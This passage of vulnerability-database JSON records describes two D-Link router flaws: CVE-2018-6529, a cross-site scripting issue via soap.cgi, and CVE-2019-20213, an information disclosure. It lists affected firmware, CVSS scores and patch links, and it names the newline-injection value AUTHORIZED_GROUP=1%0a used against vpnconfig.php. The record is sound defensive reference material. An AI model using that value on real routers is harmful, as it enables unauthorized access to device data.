"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201803-1768",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-865l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "reva_firmware_patch_1.08.b01"
},
{
"model": "dir-868l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "a1_fw112b04"
},
{
"model": "dir-860l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "a1_fw110b04"
},
{
"model": "dir-860l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "dir860la1_fw110b04"
},
{
"model": "dir-865l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "dir-865l_reva_firmware_patch_1.08.b01"
},
{
"model": "dir-868l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "dir868la1_fw112b04"
},
{
"model": "dir-868l \u003c=dir868la1 fw112b04",
"scope": null,
"trust": 0.6,
"vendor": "345 217 213 350 256 257 347 247 221 346 212 200",
"version": null
},
{
"model": "dir-865l \u003c=dir-865l reva patch 1.08.b01",
"scope": null,
"trust": 0.6,
"vendor": "345 217 213 350 256 257 347 247 221 346 212 200",
"version": null
},
{
"model": "dir-860l \u003c=dir860la1 fw110b04",
"scope": null,
"trust": 0.6,
"vendor": "345 217 213 350 256 257 347 247 221 346 212 200",
"version": null
},
{
"model": "dir-860l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "a1_fw110b04"
},
{
"model": "dir-865l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "reva_firmware_patch_1.08.b01"
},
{
"model": "dir-868l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "a1_fw112b04"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06597"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002680"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-150"
},
{
"db": "NVD",
"id": "CVE-2018-6529"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:d-link:dir-860l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-865l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-868l_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-002680"
}
]
},
"cve": "CVE-2018-6529",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2018-6529",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2018-06597",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-136561",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2018-6529",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2018-6529",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-6529",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2018-6529",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2018-06597",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201803-150",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-136561",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-6529",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06597"
},
{
"db": "VULHUB",
"id": "VHN-136561"
},
{
"db": "VULMON",
"id": "CVE-2018-6529"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002680"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-150"
},
{
"db": "NVD",
"id": "CVE-2018-6529"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS vulnerability in htdocs/webinc/js/bsc_sms_inbox.php in D-Link DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to read a cookie via a crafted Treturn parameter to soap.cgi. D-Link DIR-868L , DIR-865L ,and DIR-860L Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. D-LinkDIR-868L and others are all wireless router products of D-Link. A cross-site scripting vulnerability exists in the htdocs/webinc/js/bsc_sms_inbox.php file in D-LinkDIR-868L, DIR-865L, and DIR-860L. D-Link DIR-868L, etc. The following products and versions are affected: D-Link DIR-868L DIR868LA1_FW112b04 and earlier; DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and earlier; DIR-860L DIR860LA1_FW110b04 and earlier",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-6529"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002680"
},
{
"db": "CNVD",
"id": "CNVD-2018-06597"
},
{
"db": "VULHUB",
"id": "VHN-136561"
},
{
"db": "VULMON",
"id": "CVE-2018-6529"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-6529",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002680",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201803-150",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-06597",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-136561",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-6529",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06597"
},
{
"db": "VULHUB",
"id": "VHN-136561"
},
{
"db": "VULMON",
"id": "CVE-2018-6529"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002680"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-150"
},
{
"db": "NVD",
"id": "CVE-2018-6529"
}
]
},
"id": "VAR-201803-1768",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06597"
},
{
"db": "VULHUB",
"id": "VHN-136561"
}
],
"trust": 1.5752999514285713
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06597"
}
]
},
"last_update_date": "2024-11-23T22:00:39.328000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "DIR-860L Firmware Patch Notes",
"trust": 0.8,
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf"
},
{
"title": "DIR-865L Firmware Patch Notes",
"trust": 0.8,
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf"
},
{
"title": "DIR-868L Firmware Patch Notes",
"trust": 0.8,
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf"
},
{
"title": "Patch for D-LinkDIR Series Cross-Site Scripting Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/123967"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06597"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002680"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-136561"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002680"
},
{
"db": "NVD",
"id": "CVE-2018-6529"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://github.com/thebeeman/pwning-multiple-dlink-router-via-soap-proto"
},
{
"trust": 1.2,
"url": "ftp://ftp2.dlink.com/security_advisements/dir-860l/reva/dir-860l_reva_firmware_patch_notes_1.11b01_en_ww.pdf"
},
{
"trust": 1.2,
"url": "ftp://ftp2.dlink.com/security_advisements/dir-868l/reva/dir-868l_reva_firmware_patch_notes_1.20b01_en_ww.pdf"
},
{
"trust": 1.2,
"url": "ftp://ftp2.dlink.com/security_advisements/dir-865l/reva/dir-865l_reva_firmware_patch_notes_1.10b01_en_ww.pdf"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-6529"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-6529"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06597"
},
{
"db": "VULHUB",
"id": "VHN-136561"
},
{
"db": "VULMON",
"id": "CVE-2018-6529"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002680"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-150"
},
{
"db": "NVD",
"id": "CVE-2018-6529"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-06597"
},
{
"db": "VULHUB",
"id": "VHN-136561"
},
{
"db": "VULMON",
"id": "CVE-2018-6529"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002680"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-150"
},
{
"db": "NVD",
"id": "CVE-2018-6529"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-06597"
},
{
"date": "2018-03-06T00:00:00",
"db": "VULHUB",
"id": "VHN-136561"
},
{
"date": "2018-03-06T00:00:00",
"db": "VULMON",
"id": "CVE-2018-6529"
},
{
"date": "2018-04-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-002680"
},
{
"date": "2018-03-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-150"
},
{
"date": "2018-03-06T20:29:00.907000",
"db": "NVD",
"id": "CVE-2018-6529"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-06597"
},
{
"date": "2018-03-27T00:00:00",
"db": "VULHUB",
"id": "VHN-136561"
},
{
"date": "2018-03-27T00:00:00",
"db": "VULMON",
"id": "CVE-2018-6529"
},
{
"date": "2018-04-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-002680"
},
{
"date": "2023-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-150"
},
{
"date": "2024-11-21T04:10:50.547000",
"db": "NVD",
"id": "CVE-2018-6529"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-150"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural D-Link Product cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-002680"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-150"
}
],
"trust": 0.6
}
}
var-202001-0381
Vulnerability from variot
D-Link DIR-859 routers before v1.07b03_beta allow Unauthenticated Information Disclosure via the AUTHORIZED_GROUP=1%0a value, as demonstrated by vpnconfig.php. D-Link DIR-859 is a wireless AC1750 high power Wi-Fi Gigabit router. Attackers can use this vulnerability to obtain information through AUTHORIZED_GROUP = 1% 0a
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202001-0381",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-818lx",
"scope": "eq",
"trust": 2.2,
"vendor": "dlink",
"version": null
},
{
"model": "dir-895r",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.12b10"
},
{
"model": "dir-868l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.12b04"
},
{
"model": "dir-880l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b04"
},
{
"model": "dir-868l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2.05b02"
},
{
"model": "dir-822",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2.03b01"
},
{
"model": "dir-895l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.12b10"
},
{
"model": "dir-890r",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.11b01"
},
{
"model": "dir-823",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.00b06"
},
{
"model": "dir-869",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b02"
},
{
"model": "dir-885r",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.12b05"
},
{
"model": "dir-859",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.06b01"
},
{
"model": "dir-885l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.12b05"
},
{
"model": "dir-859",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b03"
},
{
"model": "dir-890l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.11b01"
},
{
"model": "dir-822",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.12b04"
},
{
"model": "dir-865l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.07b01"
},
{
"model": "dir-822",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-823",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-859",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-865l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-868l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-869",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-880l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-890l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-890r",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-859 \u003c1.07b03 beta",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-895l",
"scope": "eq",
"trust": 0.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-869",
"scope": "eq",
"trust": 0.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-890l",
"scope": "eq",
"trust": 0.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-890r",
"scope": "eq",
"trust": 0.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-895r",
"scope": "eq",
"trust": 0.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-890r",
"scope": "eq",
"trust": 0.6,
"vendor": "dlink",
"version": "1.11b01"
},
{
"model": "dir-885l",
"scope": "eq",
"trust": 0.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-885r",
"scope": "eq",
"trust": 0.6,
"vendor": "dlink",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-04703"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014085"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-005"
},
{
"db": "NVD",
"id": "CVE-2019-20213"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:d-link:dir-822_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-823_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-859_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-865l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-868l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-869_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-880l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-890l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-890r_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-014085"
}
]
},
"cve": "CVE-2019-20213",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2019-20213",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2020-04703",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2019-20213",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-20213",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-20213",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2019-20213",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2020-04703",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202001-005",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-04703"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014085"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-005"
},
{
"db": "NVD",
"id": "CVE-2019-20213"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-859 routers before v1.07b03_beta allow Unauthenticated Information Disclosure via the AUTHORIZED_GROUP=1%0a value, as demonstrated by vpnconfig.php. D-Link DIR-859 is a wireless AC1750 high power Wi-Fi Gigabit router. Attackers can use this vulnerability to obtain information through AUTHORIZED_GROUP = 1% 0a",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-20213"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014085"
},
{
"db": "CNVD",
"id": "CNVD-2020-04703"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-20213",
"trust": 3.0
},
{
"db": "DLINK",
